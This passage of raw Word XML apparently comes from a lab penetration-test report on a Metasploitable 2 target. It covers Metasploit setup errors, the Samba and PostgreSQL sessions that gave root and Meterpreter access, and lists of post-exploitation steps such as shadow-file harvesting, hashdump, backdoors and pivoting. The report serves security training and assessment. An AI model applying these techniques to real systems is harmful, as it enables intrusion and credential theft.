                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Issue Observed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3427"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Correction Applied</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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RHOSTS not set before running module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Module failed with "No target set" error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3427"/>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Set RHOSTS to 10.0.2.9 before executing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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LHOST not set or set to wrong interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Reverse shell payload could not route back to attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3427"/>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Set LHOST to the attacker machine's correct IP on the lab network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Wrong RPORT for Tomcat module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Module attempted connection on wrong port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3427"/>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Corrected RPORT to 8180 for the Tomcat service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="420" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">6.  Post-Exploitation Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-exploitation activities were limited in scope within this lab engagement. The primary objective was to confirm session establishment and assess the potential impact of the achieved access, rather than to conduct extended system compromise. This section documents what was observed during the active sessions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1  Samba Command Shell Session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Samba usermap_script exploit established an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">interactive command shell session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the target. Based on the Metasploitable 2 configuration, this shell typically runs as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, granting full administrative control of the operating system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Capabilities available to an attacker with this level of access include:</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Full file system access — read, write, modify, or delete any file on the system</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Credential harvesting — extract /etc/passwd and /etc/shadow for offline password cracking</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Privilege persistence — add new root-level user accounts or install backdoors for future access</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Lateral movement — use the compromised host as a pivot to attack other systems on the same network segment</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Data exfiltration — access and transfer sensitive files or database contents</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Service disruption — stop, modify, or destroy running services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2  PostgreSQL Meterpreter Session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The PostgreSQL exploit established a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the target. Meterpreter is an advanced payload that runs entirely in memory and provides an extensive set of post-exploitation capabilities through the Metasploit Framework.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter capabilities available in this session include:</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sysinfo — retrieve system information: hostname, OS version, architecture</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getuid — confirm current user context (database service user, potentially postgres or root)</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upload / download — bi-directional file transfer between attacker and target</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shell — drop into an interactive OS command shell</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hashdump — attempt to dump password hashes from the system</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port forward — tunnel additional attack traffic through the compromised host</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getsystem — attempt automatic privilege escalation to root</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run post/multi/recon/local_exploit_suggester — identify additional local privilege escalation paths</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.3  Post-Exploitation Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The table below summarises the potential post-exploitation impact across standard attack categories, based on the access levels achieved:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 15: Post-Exploitation Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:left w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:right w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:insideH w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:insideV w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Potential Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2027"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidence Basis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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System Information Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Full OS fingerprinting via Nmap; Meterpreter sysinfo available</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2027"/>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Nmap version detection; Meterpreter session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Credential dump possible via Meterpreter (hashdump); Telnet/FTP expose credentials in transit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2027"/>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Shell access; service observation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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File Access / Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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FTP (21, 2121), NFS (2049), and SMB (445) expose file transfer capabilities; Meterpreter upload/download available</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2027"/>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Scan results; Meterpreter session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Root bind shell on 1524 provides permanent access; new accounts can be created via command shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2027"/>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Port 1524 observation; shell access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Compromised host can be used as a pivot to attack other systems on the 10.0.2.x network segment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2027"/>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Lab network topology</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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User Activity Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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No direct monitoring evidence captured; capability exists via root access (audit logs, keyloggers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2027"/>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Theoretical (root access confirmed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Service Disruption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Full root access allows stopping or modifying any service on the host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2027"/>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Root shell confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-exploitation activities were limited to session establishment and impact assessment in this engagement. No destructive actions, credential exfiltration, or persistence mechanisms were deployed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="420" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">7.  Consolidated Findings and Risk Ratings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1  Risk Rating Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk ratings in this report are assigned using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Common Vulnerability Scoring System version 3.1 (CVSS 3.1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the primary reference standard. Where a published CVSS 3.1 score exists for a specific CVE, that score is used. Where the risk is based on service exposure or configuration weakness rather than a named CVE, the risk classification is assigned based on the following criteria:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 16: Risk Rating Scale</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:left w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:right w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:insideH w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:insideV w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS 3.1 Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5727"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="C00000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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9.0 – 10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Exploitable remotely without authentication; direct path to system compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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7.0 – 8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Significant risk; may require some authentication or specific conditions; serious impact if exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="7F6000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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4.0 – 6.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Moderate risk; limited impact or requires complex conditions; should be addressed as part of planned maintenance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="375623"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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0.1 – 3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Minimal risk; may contribute to attack chains; address in long-term security improvements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="1F497D"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Observations requiring awareness but posing no direct security risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
